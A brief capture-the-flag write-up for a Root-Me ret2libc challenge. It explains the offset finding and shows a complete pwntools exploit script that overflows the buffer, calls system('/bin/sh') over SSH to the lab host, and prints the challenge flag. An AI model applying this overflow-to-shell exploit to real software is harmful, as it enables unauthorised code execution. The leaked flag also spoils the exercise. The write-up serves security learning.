chall-6

ret2libc

This one was pretty easy using gdb-peda pattern create i quickly found the eip offset to be 32 and then as nx was enabled use ret2libc that's it

from pwn import *

#system=0xf7e32160
#binsh=0xf7f565db

rsystem=0xb7e690b0
rbinsh=0xb7f8ac40

payload="A"*32+pack(rsystem)+pack(0xdeadbeef)+pack(rbinsh)

s=ssh(host='challenge02.root-me.org',user='app-systeme-ch33',password='app-systeme-ch33',port=2222)

p=s.process(['ch33',payload])

p.interactive()

# R3t2l1bcISnicet0o!